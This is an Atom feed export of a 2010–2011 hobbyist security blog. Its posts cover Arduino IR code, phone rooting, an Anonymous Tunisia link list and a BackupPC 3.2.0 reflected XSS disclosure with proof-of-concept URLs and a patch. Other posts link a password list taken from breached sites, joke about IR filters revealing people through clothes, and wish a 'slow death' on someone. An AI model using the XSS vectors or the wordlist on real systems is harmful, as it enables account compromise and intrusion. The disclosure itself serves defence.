<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-7699735801453301458</id><updated>2011-11-28T05:07:07.634-08:00</updated><category term='apache'/><category term='arduino'/><category term='sweetness'/><category term='documentation'/><category term='kb'/><category term='plunder'/><category term='plunderoid'/><category term='HTTPS'/><category term='security'/><category term='cons'/><category term='as3'/><category term='bof'/><category term='dc414'/><category term='0-day'/><category term='DLL'/><category term='sugarcrm'/><category term='hacking'/><category term='ipb'/><category term='first'/><category term='freedom'/><category term='chrome'/><category term='xmas'/><category term='encryption'/><category term='hijacking'/><category term='archive'/><category term='android'/><category term='js'/><category term='anonymous freedom'/><category term='spam'/><category term='video'/><category term='DoS'/><category term='email'/><category term='unicode'/><category term='xss'/><category term='neutrality'/><category term='IR camera phone'/><category term='fun'/><category term='code'/><category term='release'/><category term='injection'/><category term='scam'/><category term='gmail'/><category term='hardware'/><category term='google'/><title type='text'>Solution X</title><subtitle type='html'>Helping to secure life and other things.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>38</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-1130256369911659276</id><published>2011-03-12T12:07:00.000-08:00</published><updated>2011-03-12T12:09:12.643-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='arduino'/><category scheme='http://www.blogger.com/atom/ns#' term='code'/><category scheme='http://www.blogger.com/atom/ns#' term='hardware'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>My lame IR copy toy.</title><content type='html'>I got a sweet arduino for my bday and it kind of just sat around till i got a few things together to start work on my first project. Well i finally got off my ass, got all the shit i needed and got to work! I am about half way done and i thought i would share my progress so far. heres a little video of my toy in action and i go over the operation and components.&lt;br /&gt;&lt;br /&gt;&lt;object width="640" height="390"&gt;&lt;param name="movie" value="https://dc414.org/wp-content/uploads/2011/03/VID_20110309_205438.flv"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="https://dc414.org/wp-content/uploads/2011/03/VID_20110309_205438.flv" type="video/x-flv" allowscriptaccess="always" allowfullscreen="true" width="640" height="390" autoplay="false"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Here is a better view of how its put together:&lt;br /&gt;&lt;a href="https://dc414.org/wp-content/uploads/2011/03/IRcopy_bb.jpg"&gt;&lt;img src="https://dc414.org/wp-content/uploads/2011/03/IRcopy_bb-300x181.jpg" alt="" title="Click for bigger image" width="500" height="360" class="alignnone size-medium wp-image-386" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;And here is my uber 1337 code :P&lt;br /&gt;&lt;code&gt;&lt;br /&gt;#include &lt; IRremote.h &gt;&lt;br /&gt;&lt;br /&gt;int IRRECV = 11;&lt;br /&gt;int READYLED = 9;&lt;br /&gt;int PLAYBUTTON = 5;&lt;br /&gt;int IRLED = 3;&lt;br /&gt;int RESETBUTTON = 7;&lt;br /&gt;int PLAYLED = 2;&lt;br /&gt;decode_results results;&lt;br /&gt;IRrecv irrecv(IRRECV);&lt;br /&gt;IRsend irsend;&lt;br /&gt;&lt;br /&gt;void setup()&lt;br /&gt;{&lt;br /&gt;  Serial.begin(9600);&lt;br /&gt;  irrecv.enableIRIn();&lt;br /&gt;  pinMode(READYLED, OUTPUT);&lt;br /&gt;  pinMode(PLAYBUTTON, INPUT);&lt;br /&gt;  pinMode(RESETBUTTON, INPUT);&lt;br /&gt;  pinMode(PLAYLED, OUTPUT);&lt;br /&gt;}&lt;br /&gt;int codeType = -1; &lt;br /&gt;unsigned int rawCodes[RAWBUF];&lt;br /&gt;int codeLen;&lt;br /&gt;void rec(decode_results *results)&lt;br /&gt;{&lt;br /&gt;  int count = results-&gt;rawlen;&lt;br /&gt;  codeLen = results-&gt;rawlen - 1;&lt;br /&gt;  for (int i = 1; i &lt;= codeLen; i++) {&lt;br /&gt;    if (i % 2) {&lt;br /&gt;      rawCodes[i - 1] = results-&gt;rawbuf[i]*USECPERTICK - MARK_EXCESS;&lt;br /&gt;      Serial.print(" m");&lt;br /&gt;    } &lt;br /&gt;    else {&lt;br /&gt;      rawCodes[i - 1] = results-&gt;rawbuf[i]*USECPERTICK + MARK_EXCESS;&lt;br /&gt;      Serial.print(" s");&lt;br /&gt;    }&lt;br /&gt;    Serial.print(rawCodes[i - 1], DEC);&lt;br /&gt;  }&lt;br /&gt;  Serial.println("");&lt;br /&gt;  digitalWrite(READYLED, HIGH);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;void play()&lt;br /&gt;{&lt;br /&gt;  digitalWrite(PLAYLED, HIGH);&lt;br /&gt;  Serial.println(rawCodes[0]);&lt;br /&gt;  irsend.sendRaw(rawCodes, codeLen, 38);&lt;br /&gt;  delay(800);&lt;br /&gt;  digitalWrite(PLAYLED, LOW);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;void reset()&lt;br /&gt;{&lt;br /&gt;  int codeType = -1; &lt;br /&gt;  unsigned int rawCodes[RAWBUF];&lt;br /&gt;  int codeLen;&lt;br /&gt;  digitalWrite(READYLED, LOW);&lt;br /&gt;  setup();&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;void loop()&lt;br /&gt;{&lt;br /&gt;  if (irrecv.decode(&amp;results) &amp;&amp; digitalRead(READYLED) == LOW) {&lt;br /&gt;    rec(&amp;results);&lt;br /&gt;    irrecv.resume();&lt;br /&gt;  }&lt;br /&gt;  if (digitalRead(PLAYBUTTON) == LOW &amp;&amp; digitalRead(READYLED) == HIGH)&lt;br /&gt;  {&lt;br /&gt;    play();&lt;br /&gt;  }&lt;br /&gt;  if (digitalRead(RESETBUTTON) == LOW)&lt;br /&gt;  {&lt;br /&gt;    reset();&lt;br /&gt;  }&lt;br /&gt;}&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;Ok thats all i got, peace.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-1130256369911659276?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/1130256369911659276/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2011/03/my-lame-ir-copy-toy.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/1130256369911659276'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/1130256369911659276'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2011/03/my-lame-ir-copy-toy.html' title='My lame IR copy toy.'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-5344462880332714830</id><published>2011-02-03T19:48:00.000-08:00</published><updated>2011-02-03T19:50:14.813-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='anonymous freedom'/><title type='text'>Material related to operation Tunisia</title><content type='html'>First the why:&lt;br /&gt;&lt;iframe title="YouTube video player" width="480" height="390" src="http://www.youtube.com/embed/_cWOK0Lfh7w" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;Yeah i hope someone finds the ppl in that van and gives them a slow death!&lt;br /&gt;&lt;br /&gt;Anonymous care package for the poor ppl of Egypt -  www.bit.ly/hsAjGq&lt;br /&gt;&lt;br /&gt;This from - http://typewith.me/optunisia&lt;br /&gt;´======================================================&lt;br /&gt;( ),,( )                         irc.anonops.ru:6667 #optunisia                                           ( ),( )&lt;br /&gt;( ';' )                                                                                                                            (';' )&lt;br /&gt;-(. )-                                                                                                                           -('.')-&lt;br /&gt;I I CENTRAL COLLECTION PAD FOR OPERATION TUNISIA RELATED MATERIAL  I I&lt;br /&gt;=======================================================&lt;br /&gt;If you started a pad about something related to Operation Tunisia, add it to this list.&lt;br /&gt;Please save with Nick!!!&lt;br /&gt;&lt;br /&gt;Anonymous Press Declarations&lt;br /&gt;[2011-01-15] Tunisia and its chance... (not completed; need rework!)&lt;br /&gt;http://piratenpad.de/APR20110115&lt;br /&gt;&lt;br /&gt;Guide to Protecting the Tunisian Revolution, Part One: Initial Security&lt;br /&gt;http://typewith.me/how-to-protect-tunisian-arabic-french yo&lt;br /&gt;Guide to Protecting the Tunisian Revolution, Part Two: Safety in Confrontation&lt;br /&gt;http://www.dailykos.com/story/2011/1/16/936793/-Please-distribute-to-Tunisians:-Safety-in-Confrontation&lt;br /&gt;&lt;br /&gt;Guide to Protecting the Tunisian Revolution, Part Three: Transforming National Politics (still in progress, please assist)&lt;br /&gt;http://www.typewith.me/qdjqeFFu8O&lt;br /&gt;&lt;br /&gt;Stuff about the families who're stealing Tunisia: (Arabic-&amp;gt;English Translation needed!!)&lt;br /&gt;http://piratepad.net/lMiNqsnZfi&lt;br /&gt;copy at http://typewith.me/MvarLgc6u6&lt;br /&gt;&lt;br /&gt;Manifesto from tunisian protesters:&lt;br /&gt;http://typewith.me/stDHppshwJ  &amp;lt;&lt;br /&gt;&lt;br /&gt;Video footage of Tunisia (add your own!)&lt;br /&gt;http://typewith.me/TunisiaVideoFootage&lt;br /&gt;&lt;br /&gt;Tunisians needs FTPs for mirror -  #ftp   (died?)no #ftp&lt;br /&gt;Info-List: http://piratenpad.de/6V13pN0sxM&lt;br /&gt;&lt;br /&gt;Untrusted Twitter accounts spreading false news&lt;br /&gt;http://piratepad.net/GGYVc6RtnA &amp;lt; reverted&lt;br /&gt;&lt;br /&gt;Translation pad for Tunisia IRC project&lt;br /&gt;http://typewith.me/TunisiaIRCTranslation&lt;br /&gt;&lt;br /&gt;Tunisians, tell your stories here! (need translators)&lt;br /&gt;http://piratepad.net/G9CvOF3dbg&lt;br /&gt;copy at http://typewith.me/wzfsEVIx7B&lt;br /&gt;&lt;br /&gt;Manifesto from Anon about Tunisia:&lt;br /&gt;http://piratepad.net/5d891ABcBW&lt;br /&gt;&lt;br /&gt;Video ideas and links:&lt;br /&gt;http://piratepad.net/VJhU2KXfMQ&lt;br /&gt;&lt;br /&gt;"Video site" zip and mirrors&lt;br /&gt;http://pad.telecomix.org/tnvideos-mirrors&lt;br /&gt;&lt;br /&gt;Video about a man put out of his country, and subtitle translation (need an incruster for the subtitle)&lt;br /&gt;http://piratepad.net/7eT1ozHLSN&lt;br /&gt;copy at http://typewith.me/7fc5aYZ2LW&lt;br /&gt;&lt;br /&gt;Anon Video to be subtitled: http://www.youtube.com/watch?v=BFLaBRk9wY0&lt;br /&gt;http://piratepad.net/XZtZlf3acf&lt;br /&gt;&lt;br /&gt;French Pdf to be translated: Relating to the familie who Reign over Carthage.&lt;br /&gt;http://i3.makcdn.com/wp-content/blogs.dir/14986/files//2009/11/la-regente-2-carthage.pdf&lt;br /&gt;http://piratepad.net/VyLDOHVMyD&lt;br /&gt;&lt;br /&gt;Diary of Tunisia:&lt;br /&gt;http://typewith.me/3koSuMGO8O&lt;br /&gt;&lt;br /&gt;Related Stuff:&lt;br /&gt;Anonymous PR Pad&lt;br /&gt;http://piratenpad.de/AnonymousPR&lt;br /&gt;&lt;br /&gt;Swift Assist - helpful notes on establishing secure networks for Tunisian revolutionaries&lt;br /&gt;http://typewith.me/owA6rmGfP6&lt;br /&gt;&lt;br /&gt;What the fuck is freedom of speech, anyway? - introduction via IHRL&lt;br /&gt;http://piratepad.net/whGudXWEmM&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-5344462880332714830?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/5344462880332714830/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2011/02/material-related-to-operation-tunisia.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/5344462880332714830'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/5344462880332714830'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2011/02/material-related-to-operation-tunisia.html' title='Material related to operation Tunisia'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/_cWOK0Lfh7w/default.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-1490442970028896884</id><published>2011-01-30T12:38:00.000-08:00</published><updated>2011-01-30T12:39:19.775-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='injection'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='xss'/><category scheme='http://www.blogger.com/atom/ns#' term='code'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>BackupPC 3.2.0 XSS</title><content type='html'>I dont normally make posts about XSS exploits unless there is some special circumstances. I picked this one because BackupPC is a popular network backup tool that you might find in networks all over the place and because there is no built in security you normally only find it on "secure" trusted networks. &lt;br /&gt;&lt;br /&gt;So anyway the issue is in Browse.pm. It gets a num variable passed to it via get request, then displays the unsanitary input back to the user. So heres PoCs of both the vectors i found.&lt;br /&gt;&lt;br /&gt;PoC 1: http://target.server/cgi-bin/BackupPC_Admin?action=browse&amp;host=realhostneeded&amp;num=1[XSS] - comes back as a valid request and runs XSS&lt;br /&gt;&lt;br /&gt;PoC 2: http://target.server/cgi-bin/BackupPC_Admin?action=browse&amp;host=realhostneeded&amp;num=[XSS] - comes back as ERROR and runs XSS&lt;br /&gt;&lt;br /&gt;Like most XSS holes its a easy fix, just edit line 55 in /usr/local/BackupPC/lib/BackupPC/CGI/Browse.pm to read like so:&lt;br /&gt;my $num   = ${EscHTML($In{num})};&lt;br /&gt;&lt;br /&gt;or download this &lt;a href="/wp-content/uploads/2011/01/Browse.pm_.tar.gz"&gt;Browse.pm&lt;/a&gt; file and replace it with the one in /usr/local/BackupPC/lib/BackupPC/CGI/ on the installed server.&lt;br /&gt;&lt;br /&gt;Ok thats it, peace.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-1490442970028896884?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/1490442970028896884/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2011/01/backuppc-320-xss.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/1490442970028896884'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/1490442970028896884'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2011/01/backuppc-320-xss.html' title='BackupPC 3.2.0 XSS'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-2401605027427616273</id><published>2011-01-09T12:03:00.000-08:00</published><updated>2011-01-10T17:12:13.598-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IR camera phone'/><category scheme='http://www.blogger.com/atom/ns#' term='first'/><category scheme='http://www.blogger.com/atom/ns#' term='dc414'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='hardware'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Poor mans IR filters for phones</title><content type='html'>At the last dc414 meeting i gave out IR filters for camera phones that i made my self. Most cameras on phones are made really cheaply and do not filter out IR, thats why camp fires and such come out looking a little purple, or pink when us take a pic using a camera phone. This happens because the sensor interprets IR to the human visual spectrum as white. To make the filters i went to walgreens, got some 35mm film, opened it up and exposed the entire role to bright light, rolled it back up into its container and asked the kind ppl at the one hour photo counter to develop my role. I also informed them that i didnt want any prints, just the negatives. Then of course i had to explain to them what it was i wanted. You can see how this might seem to be a odd request so be expecting to take a little extra time if you choose to go this route, it will take some explaining.&lt;br /&gt;&lt;br /&gt;So why IR filters? Well taking pics with these little guys makes stuff like envelopes transparent, as well as some plastics and CLOTHES!! Making this every nerds dream! lol.&lt;br /&gt;&lt;br /&gt;Heres a pic of the IR filters "film":&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_4h4X2wOzUHc/TSut8FxDILI/AAAAAAAAAD8/9muNk3mveEY/s1600/irfilter.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 200px; height: 150px;" src="http://1.bp.blogspot.com/_4h4X2wOzUHc/TSut8FxDILI/AAAAAAAAAD8/9muNk3mveEY/s200/irfilter.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5560729412770668722" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Heres a pic a took of my stove top:&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_4h4X2wOzUHc/TSuuTh-pVxI/AAAAAAAAAEE/N_OKw0bqEY0/s1600/IMG_20110104_200632.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 200px; height: 150px;" src="http://1.bp.blogspot.com/_4h4X2wOzUHc/TSuuTh-pVxI/AAAAAAAAAEE/N_OKw0bqEY0/s200/IMG_20110104_200632.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5560729815480882962" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-2401605027427616273?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/2401605027427616273/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2011/01/poor-mans-ir-filters-for-phones.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/2401605027427616273'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/2401605027427616273'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2011/01/poor-mans-ir-filters-for-phones.html' title='Poor mans IR filters for phones'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_4h4X2wOzUHc/TSut8FxDILI/AAAAAAAAAD8/9muNk3mveEY/s72-c/irfilter.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-3662535012290204423</id><published>2011-01-01T09:14:00.000-08:00</published><updated>2011-01-01T12:41:52.718-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='hardware'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><category scheme='http://www.blogger.com/atom/ns#' term='android'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Re-DROID with stock 2.2.1</title><content type='html'>Over the holidays i dropped my phone "A Motorola DROID" in some salt filled slush in the parking lot of walmart :( It still worked kind of, buttons seemed to go crazy however. Hitting just one button  did multiable things. So i took it to my local verizon store, they informed me that i would be getting a new phone in the mail in the next week or so :( Luckily for me i only had to wait four days or so, but they sent me the wrong fucking phone. Again i go back to Verizon to bitch but this time they have my phone in stock...ok. Sweet i got my new old phone. &lt;br /&gt;&lt;br /&gt;My new old phone is nice but i found that it came with Android 2.2.1 and not 2.1 like it did before. I gave the old update.zip root i had from my old phone a try but it didn't do shit. So i took to the net to find a new setup. After a few failed attampts i found this &lt;a href="http://forum.xda-developers.com/showthread.php?t=803682"&gt;thread&lt;/a&gt; about a app called SuperOneClick. I had to use cmoney's XP desktop and install &lt;a href="http://msdn.microsoft.com/en-us/netframework/cc378097"&gt;.NET 3.5&lt;/a&gt; form M$. That was all i need to get the SuperOneClick software to run on the desktop. To get the pc to phone data connection going at the level that the app needed i had install the &lt;a href="http://www.motorola.com/staticfiles/Support/Experiences/Global_Drivers/USB_Drivers_bit_4.8.0.exe"&gt;Motorola Phone USB drivers&lt;/a&gt;. Now all i had to do was make sure USB debugging was enabled on my phone. Plug in the USB cable from the PC to my phone, hit the root button and wait for it to do its thing! Thanx to everyone involved in the SuperOneClick software, you did a awesome job!! I am now enjoying my new old rooted DROID :D There is still more work to be done on this but that will be later.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-3662535012290204423?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/3662535012290204423/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2011/01/re-droid-with-stock-221.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/3662535012290204423'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/3662535012290204423'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2011/01/re-droid-with-stock-221.html' title='Re-DROID with stock 2.2.1'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-8325851338140698114</id><published>2010-12-24T08:43:00.001-08:00</published><updated>2010-12-24T08:45:04.130-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='xmas'/><title type='text'>Have a good one!</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://rockedbythreeshots.squarespace.com/storage/31008_sexy_christmas_Custom%20copy.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 450px; height: 613px;" src="http://rockedbythreeshots.squarespace.com/storage/31008_sexy_christmas_Custom%20copy.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-8325851338140698114?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/8325851338140698114/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/12/have-good-one.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/8325851338140698114'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/8325851338140698114'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/12/have-good-one.html' title='Have a good one!'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-8949984751556172114</id><published>2010-12-15T13:43:00.000-08:00</published><updated>2010-12-15T14:13:31.659-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='kb'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Master pw list: Updated!</title><content type='html'>&lt;a href="http://pastebin.com/HkuMbY8U"&gt;HERE&lt;/a&gt; is a pw list with the most common passwords found in the &lt;a href="http://blog.jimmyr.com/Password_analysis_of_databases_that_were_hacked_28_2009.php"&gt;singles.com, Myspace, phpbb&lt;/a&gt;, &lt;a href="http://www.acunetix.com/blog/news/statistics-from-10000-leaked-hotmail-passwords/"&gt;hotmail&lt;/a&gt;, and the &lt;a href="http://blogs.wsj.com/digits/2010/12/13/the-top-50-gawker-media-passwords/"&gt;Gawker&lt;/a&gt; hacks. There is 267 passwords in all, mostly names, single words, and/or really short phrases "fuckyou!" lol. Enjoy ;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-8949984751556172114?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/8949984751556172114/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/12/master-pw-list-2.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/8949984751556172114'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/8949984751556172114'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/12/master-pw-list-2.html' title='Master pw list: Updated!'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-4412410230368526132</id><published>2010-12-07T19:10:00.000-08:00</published><updated>2010-12-07T19:28:18.111-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HTTPS'/><category scheme='http://www.blogger.com/atom/ns#' term='chrome'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='freedom'/><title type='text'>HTTPS on Chrome Web Store :)</title><content type='html'>HTTPS is now on &lt;a href="https://chrome.google.com/webstore/detail/hgnokomidnmbklcnmongappmfklabemf"&gt;Chrome Web Store&lt;/a&gt; :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-4412410230368526132?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/4412410230368526132/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/12/https-on-chrome-web-store.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/4412410230368526132'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/4412410230368526132'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/12/https-on-chrome-web-store.html' title='HTTPS on Chrome Web Store :)'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-4163158956959354519</id><published>2010-11-18T18:45:00.000-08:00</published><updated>2010-11-18T19:31:30.326-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='code'/><category scheme='http://www.blogger.com/atom/ns#' term='encryption'/><category scheme='http://www.blogger.com/atom/ns#' term='chrome'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>HTTPS everywhere for chrome!!</title><content 